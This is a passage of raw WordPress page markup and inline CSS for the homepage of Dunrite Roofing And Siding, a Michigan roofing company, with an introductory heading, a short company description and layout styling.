.skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a202d1b2-2693-46ac-9aac-5131073b5669\"} -->\n<style type=\"text/css\"> .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a202d1b2-2693-46ac-9aac-5131073b5669 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e922e93a-8271-4655-97bb-328ea23766a6\"} -->\n<style type=\"text/css\"> .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e922e93a-8271-4655-97bb-328ea23766a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"a95a693b-83a8-40bc-b96a-96cca414adaf\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-a95a693b-83a8-40bc-b96a-96cca414adaf background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2e718769-fcd4-4785-9412-0cd3058119e1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2e718769-fcd4-4785-9412-0cd3058119e1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"6549beaf-ccab-45d8-a2d8-1762500e8593\"} -->\n<style type=\"text/css\"> .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6549beaf-ccab-45d8-a2d8-1762500e8593\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"46b2c521-30e6-4f12-bba8-c52b80616d9c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-46b2c521-30e6-4f12-bba8-c52b80616d9c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"baab3fad-1feb-480f-b0a0-542d07c7eba5\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-baab3fad-1feb-480f-b0a0-542d07c7eba5 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"e4337017-bf4d-4e71-bbfe-842d1c251e6c\"} -->\n<style type=\"text/css\"> .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e4337017-bf4d-4e71-bbfe-842d1c251e6c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7840f5f3-0744-458f-9ff2-16549137981d\"} -->\n<style type=\"text/css\"> .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7840f5f3-0744-458f-9ff2-16549137981d\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"65659e02-d7c8-4601-8298-92cc76359ea6\"} -->\n<style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n 